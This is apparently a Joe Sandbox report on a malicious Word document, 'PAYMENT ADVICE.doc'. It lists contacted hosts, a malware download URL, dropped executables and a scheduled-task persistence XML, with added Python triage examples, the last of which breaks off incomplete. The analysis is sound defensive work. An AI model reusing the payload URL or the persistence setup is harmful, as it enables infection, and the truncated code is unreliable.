                                                    http://ocsp.entrust.net0Dmerciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://cps.chambersign.org/cps/chambersignroot.html0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://DynDns.comDynDNSmerciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sectigo.com/CPS0merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.entrust.net/server1.crl0merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.ancert.com/cps0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://ca.sia.it/seccli/repository/CRL.der0Jmerciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.registradores.org/scr/normativa/cp_f2.htm0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.signatur.rtr.at/de/directory/cps.html0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.echoworx.com/ca/root2/cps.pdf0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://rca.e-szigno.hu/ocsp0-merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://www.netlock.hu/docs/merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.a-cert.at/certificate-policy.html0;merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.certplus.com/CRL/class1.crl0merciesxdncdc.exe, 00000007.00000003.2226349491.00000000062A9000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.a-cert.at/certificate-policy.html0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.catcert.net/verarrel05merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.pki.gva.es/cps0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.pki.gva.es/cps0%merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://www.wellsfargo.com/certpolicy0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://secure.comodo.com/CPS0merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpfalse
                                                                    high

                                                                    Contacted IPs


                                                                    Public

IP: 104.21.27.166
Domain: maritradeshipplng.com
Country: United States
ASN: 13335
ASN Name: CLOUDFLARENETUS
Malicious: true

IP: 198.54.122.60
Domain: mail.privateemail.com
Country: United States
ASN: 22612
ASN Name: NAMECHEAP-NETUS
Malicious: false

                                                                    General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452655
Start date: 22.07.2021
Start time: 17:29:58
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PAYMENT ADVICE.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • HDC enabled
                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@8/16@11/2
EGA Information: Failed
HDC Information: Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .doc
                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                    • Attach to Office via COM
                                                                    • Scroll down
                                                                    • Close Viewer
                                                                    Warnings:
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/452655/sample/PAYMENT ADVICE.doc

                                                                    Simulations

                                                                    Behavior and APIs

Time: 17:30:37
Type: API Interceptor
Description: 53x Sleep call for process: EQNEDT32.EXE modified

Time: 17:30:39
Type: API Interceptor
Description: 1353x Sleep call for process: merciesxdncdc.exe modified

Time: 17:31:05
Type: API Interceptor
Description: 1x Sleep call for process: schtasks.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs


Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

maritradeshipplng.com
RFQ - 4 SCH 160 EQUAL TEE.doc (malicious)
• 104.21.27.166
RFQ Ranger Neo.doc (malicious)
• 172.67.169.145
CORRECT BANK DETAILS FORM.doc (malicious)
• 172.67.169.145
Shipping Documents .doc (malicious)
• 172.67.169.145
REQUEST FOR QUOTATIO 158930165.doc (malicious)
• 172.67.169.145
Inv PKF312021.doc (malicious)
• 172.67.169.145
RFQ- ROTO Fittings- 19072021.doc (malicious)
• 172.67.169.145
ORDER_683703789238738.xlsx (malicious)
• 104.21.27.166
New Order for Promax Ranger Neo2.doc (malicious)
• 172.67.169.145
BOQ.doc (malicious)
• 172.67.169.145
Reversed Invoice KPR2021.doc (malicious)
• 104.21.27.166
OUTGOING PAYMENT MT103_WA00049739_______________________________jpg.exe (malicious)
• 172.67.169.145
PO 4020169418_SHC 1000350721.doc (malicious)
• 172.67.169.145
Technical Requirement.doc (malicious)
• 104.21.27.166
amended invoice packing list.doc (malicious)
• 104.21.27.166
New Inquiry.doc (malicious)
• 104.21.27.166
RFQ-GENERATOR SUPPLY_SPECS.doc (malicious)
• 172.67.169.145
DOCUMENT.doc (malicious)
• 172.67.169.145
Reversed invoice.doc (malicious)
• 172.67.169.145
Tender Documents.doc (malicious)
• 104.21.27.166

mail.privateemail.com
ORDER . 4500028602 .doc (malicious)
• 198.54.122.60
nZdwtTEYoW.exe (malicious)
• 198.54.122.60
CORRECT BANK DETAILS FORM.doc (malicious)
• 198.54.122.60
Shipping Documents .doc (malicious)
• 198.54.122.60
0Lh7eA2VUZ.exe (malicious)
• 198.54.122.60
REQUEST FOR QUOTATIO 158930165.doc (malicious)
• 198.54.122.60
Inv PKF312021.doc (malicious)
• 198.54.122.60
RFQ- ROTO Fittings- 19072021.doc (malicious)
• 198.54.122.60
SOA.exe (malicious)
• 198.54.122.60
20210716001.exe (malicious)
• 198.54.122.60
20210716001.exe (malicious)
• 198.54.122.60
Inquiry-Order.exe (malicious)
• 198.54.122.60
New Order for Promax Ranger Neo2.doc (malicious)
• 198.54.122.60
JaqsKbRJ8w.exe (malicious)
• 198.54.122.60
neGJUsBCPT.exe (malicious)
• 198.54.122.60
5Q2N9nbIIR.exe (malicious)
• 198.54.122.60
BOQ.doc (malicious)
• 198.54.122.60
Reversed Invoice KPR2021.doc (malicious)
• 198.54.122.60
9PcMMlkF9y.exe (malicious)
• 198.54.122.60
6mBVAJrIcy.exe (malicious)
• 198.54.122.60

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

NAMECHEAP-NETUS
NHnpjXX0sb (malicious)
• 37.61.233.132
Scan003000494 pdf.exe (malicious)
• 104.219.248.49
Statement SKBMT 09818.jar (malicious)
• 63.250.34.223
41609787.exe (malicious)
• 198.54.115.48
ORDER . 4500028602 .doc (malicious)
• 198.54.122.60
Payment_invoice.exe (malicious)
• 198.54.117.212
SUpODCSauS (malicious)
• 198.54.114.130
0ZZqw52a6S.exe (malicious)
• 199.193.7.228
nZdwtTEYoW.exe (malicious)
• 198.54.122.60
CORRECT BANK DETAILS FORM.doc (malicious)
• 198.54.122.60
Shipping Documents .doc (malicious)
• 198.54.122.60
QxnlprRUTx.exe (malicious)
• 199.188.200.230
0Lh7eA2VUZ.exe (malicious)
• 198.54.122.60
REQUEST FOR QUOTATIO 158930165.doc (malicious)
• 198.54.122.60
Statement.xlsx (malicious)
• 162.0.237.9
Inv PKF312021.doc (malicious)
• 198.54.122.60
RFQ- ROTO Fittings- 19072021.doc (malicious)
• 198.54.122.60
INVOICE.exe (malicious)
• 198.54.117.211
Order.exe (malicious)
• 198.54.117.215
SOA.exe (malicious)
• 198.54.122.60

CLOUDFLARENETUS
PO20210722.xlsx (malicious)
• 162.159.130.233
New order 11244332.pdf.exe (malicious)
• 172.67.188.154
Z0hOr2pD7k.exe (malicious)
• 1.1.1.1
USD_SLIP.docx (malicious)
• 104.21.19.245
DHL JULY STATEMENT OF ACCOUNT.exe (malicious)
• 104.21.19.200
qK3005mdZn.exe (malicious)
• 172.67.168.51
whesilox.exe (malicious)
• 172.67.188.154
Bank contract,PDF.exe (malicious)
• 172.67.188.154
Scan003000494 pdf.exe (malicious)
• 172.67.188.154
Swift-pdf.exe (malicious)
• 104.21.13.164
Order _ 08201450.doc (malicious)
• 172.67.188.154
aLLEK0YD2O.exe (malicious)
• 104.21.13.164
Statement SKBMT 09818.jar (malicious)
• 66.235.200.145
DOC98374933_JULY2021.EXE (malicious)
• 172.67.203.175
Specifications_Details_20337_FLQ.exe (malicious)
• 172.67.188.154
RFQ - 4 SCH 160 EQUAL TEE.doc (malicious)
• 172.67.169.145
RIi1iCfuVK.exe (malicious)
• 104.21.51.99
kkXJRT8vEl.exe (malicious)
• 104.21.51.99
kS2dqbsDwD.exe (malicious)
• 104.25.234.53
Nb2HQZZDIf.exe (malicious)
• 104.25.233.53

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: Microsoft Cabinet archive data, 61020 bytes, 1 file
Category: dropped
Size (bytes): 61020
Entropy (8bit): 7.994886945086499
Encrypted: true
SSDEEP: 1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5: 2902DE11E30DCC620B184E3BB0F0C1CB
SHA1: 5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256: E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512: EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: data
Category: dropped
Size (bytes): 326
Entropy (8bit): 3.128132928323873
Encrypted: false
SSDEEP: 6:kK5l5sqdoW+N+SkQlPlEGYRMY9z+4KlDA3RUeIlD1Ut:mG5kPlE99SNxAhUe0et
MD5: 9B5941799D0326F5D38F79BAFF58369B
SHA1: E636D57049B73BA03C807374AE7141E2251A7953
SHA-256: 16B2D9650A740EF9EBA55FE991AE95F716BAF0DBB3B94A30429D9CD3CBF02CDD
SHA-512: 04143BB2776F5F185B0A056029BB38DC828787B97ADBA0273DA44D104C9A94CF8DD300F50BA4BBB2EC7720779FCD5E6E0F3CF7AB1FA5F9DCC1B4B418C2056083
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 918016
Entropy (8bit): 7.288418109516271
Encrypted: false
SSDEEP: 24576:o8mDgYIvzz43Apj32FeC/V87ZXKzahp/:e1KHcApj3ql87EO
MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D
SHA1: 3C613A4D232645CCCBC7C1D8A3A8AFB54CD2D56C
SHA-256: AE7399822AD5EF4D9BD2690DF74F6F1B472103380BE74FCA33611CE7265EBC01
SHA-512: E9CEF57CAA3EC7A32D526934BF83154E555B0577629FA527028AD9D6385C80629917A2C46BE82388616A670F0830F4EB23A883A2CB34DF7EC28330A7A1B4E77A
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 24%
Reputation: low
IE Cache URL: http://maritradeshipplng.com/wayss/okilo.exe
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7621A4C2-B642-4F8D-8632-93AA6D767CE8}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1034
Entropy (8bit): 1.9979633320383752
Encrypted: false
SSDEEP: 12:3TURdO2GPUXoDIlulDx9vlk56/buvq2Zf/h:Cd+PMplulDbvy56/bunf/h
MD5: A0992BC512D99AC859A0EF0FDE87A283
SHA1: 978E5F05BFF696D3579CBFCBE869CC586F723A21
SHA-256: 1947CED15B6C19F1F910A911FBC3BFB77ABD80B441D029FE60C2DFB0E4B6850F
SHA-512: DE3D1AFB6DE9845A746A26E3F5195504C58DD5059C15B581731C42561F504F46CD62120EA14F0B6101FE7B31080741589EB45242C4789DC2ED109D90449DC0C5
Malicious: false
Reputation: low
                                                                                                            Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3.9.5.8.6.5.8.9. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . .R.s.3.I.f.w.q.8.j.D.v.R.J.B.6.x.0._.j.k.n.4.w.P.A.6.b.M.q.k.t.3.F.I.D.O.W.s.Y.V.4.p.6.r.J.V.A.Z.e.A.J.1.r.A.l.c.S.Q.1.w.Z.B.k.0.t.s.w.u.0.M. . . . . . . . . . . . . . . .9.3.4.1.3.6.2.6.6.9.3.4.1.3.6.2.6.6.=....... .E.q.u.a.t.i.o.n...3.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F1B80B-61BE-41BF-89DB-AF92964D1C77}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA-1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\Cab1C98.tmp
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: Microsoft Cabinet archive data, 61020 bytes, 1 file
Category: dropped
Size (bytes): 61020
Entropy (8bit): 7.994886945086499
Encrypted: true
SSDEEP: 1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
MD5: 2902DE11E30DCC620B184E3BB0F0C1CB
SHA-1: 5D11D14A2558801A2688DC2D6DFAD39AC294F222
SHA-256: E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
SHA-512: EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
Malicious: false
Reputation: moderate, very likely benign file
Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
C:\Users\user\AppData\Local\Temp\Tar1C99.tmp
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: data
Category: dropped
Size (bytes): 158974
Entropy (8bit): 6.311775051607851
Encrypted: false
SSDEEP: 1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
MD5: E4731F8A3E7352DBA44EC7D3DD15BAEA
SHA-1: D5CA0025FBD356DEB8EDE35001F93039625562A5
SHA-256: 6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
SHA-512: E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
Malicious: false
Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
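The two entries above show how far the Entropy and Encrypted columns can be trusted on their own: Cab1C98.tmp scores 7.99 and is flagged encrypted, yet its preview shows it is a cabinet holding authroot.stl (the Windows certificate trust list), and Tar1C99.tmp is the signed trust-list data it unpacks to at entropy 6.3. The Python below is an added example, not Joe Sandbox code: it recomputes 8-bit Shannon entropy and a magic-byte type guess over constructed sample buffers, applies a hypothetical 7.9 cut-off for the encrypted/packed flag (the report's real threshold is not published), and treats a cabinet container as compressed rather than encrypted.

```python
"""Recompute the per-file metrics shown in a dropped-file listing: 8-bit Shannon
entropy, an entropy-based encrypted/packed flag, and a magic-byte type guess.
Added example; the threshold and the sample buffers are constructed."""
import math
from collections import Counter

# Assumption: Joe Sandbox does not publish the cut-off behind its "Encrypted"
# column. 7.9 is a hypothetical value consistent with the listing (7.99 -> true,
# 7.29 -> false).
ENCRYPTED_THRESHOLD = 7.9

# Leading bytes of the file types that appear in the listing.
MAGIC = [
    (b"MZ", "PE executable"),
    (b"MSCF", "Microsoft Cabinet archive"),
    (b"SQLite format 3\x00", "SQLite 3.x database"),
    (b"<?xml", "XML document"),
    (b"L\x00\x00\x00\x01\x14\x02\x00", "Windows shortcut (.lnk)"),
]


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_type(data: bytes) -> str:
    """Type guess from the magic bytes; 'data' when nothing matches."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "data"


def triage(data: bytes) -> dict:
    """Reproduce the Entropy / Encrypted / File Type columns for one buffer."""
    ent = shannon_entropy(data)
    kind = guess_type(data)
    flagged = ent >= ENCRYPTED_THRESHOLD
    # Caveat: compression is indistinguishable from encryption by entropy alone.
    # Cab1C98.tmp (7.99, "Encrypted: true") is a cabinet holding authroot.stl,
    # the Windows certificate trust list, so its flag reflects compression.
    if flagged and kind == "Microsoft Cabinet archive":
        verdict = "compressed container; high entropy is expected, not evidence of encryption"
    elif flagged:
        verdict = "likely encrypted or packed; inspect the unpacked contents"
    else:
        verdict = "plaintext or lightly compressed"
    return {"entropy": round(ent, 4), "type": kind,
            "encrypted_flag": flagged, "verdict": verdict}


# Constructed sample buffers (not the report's files).
SAMPLES = {
    "zero-filled (like the 1024-byte ~WRS tmp)": bytes(1024),
    "uniform byte distribution": bytes(range(256)) * 4,
    "fake cabinet": b"MSCF" + bytes(range(256)) * 4,
    "task xml": b'<?xml version="1.0"?><Task><Settings/></Task>' * 20,
}

if __name__ == "__main__":
    for label, buf in SAMPLES.items():
        print(f"{label:45} {triage(buf)}")
```

The magic-byte check is deliberately run before the entropy verdict: a high-entropy PE body with a .NET header, like the 918016-byte droppers in this listing at 7.29, is a different triage question from a high-entropy cabinet, and the type decides which question to ask.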
C:\Users\user\AppData\Local\Temp\tmp2E52.tmp
Process: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1619
Entropy (8bit): 5.149515696926573
Encrypted: false
SSDEEP: 24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBItn:cbhZ7ClNQi/rydbz9I3YODOLNdq3I
MD5: 70A159A3BAD5639BFBC4FB11D77059B7
SHA-1: 233D04B3ACAF4ED93FF029B11099CE048A0376B5
SHA-256: 7FB966A4E0F49D41ECE7FEA26CB4AEF90466119D8F00C84E0195D5F5AACC3880
SHA-512: E84C3AD4DEBA2B2938A17CA12C1A610969BC53BCE12C752231A064ACE1E3747BBB73AC8574B91C647F857ABED5201D0674483EA7FA6FB4D1BE4AECC0EEF4E2DA
Malicious: true
Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
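The tmp2E52.tmp entry is a Task Scheduler definition written by merciesxdncdc.exe (the signature list at the top of the report notes schtasks.exe use); the preview is cut off before the Actions element, so the command the task runs is not on this page. The Python below is an added example, not part of the report: it parses a constructed task XML that mirrors the visible fields, with a hypothetical Actions path added so there is something to check, and collects the indicators a responder looks for in such a file: an enabled logon trigger, a registration date years older than the analysis date (2021-07-22 is assumed from the LNK timestamps further down the listing), StartWhenAvailable, AllowHardTerminate set to false, a LeastPrivilege principal (no elevation prompt needed), and an executable under a user-writable directory.

```python
"""Triage a Windows Task Scheduler XML definition for persistence indicators.
Added example; the sample XML is constructed from the fields visible in the
report preview and is not the dropped file itself."""
import xml.etree.ElementTree as ET
from datetime import datetime

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: analysis date taken from the LNK timestamps in the report.
ANALYSIS_DATE = datetime(2021, 7, 22)

# Constructed sample. Everything up to <StartWhenAvailable> mirrors the preview;
# the <Actions> block is HYPOTHETICAL because the preview stops before it.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
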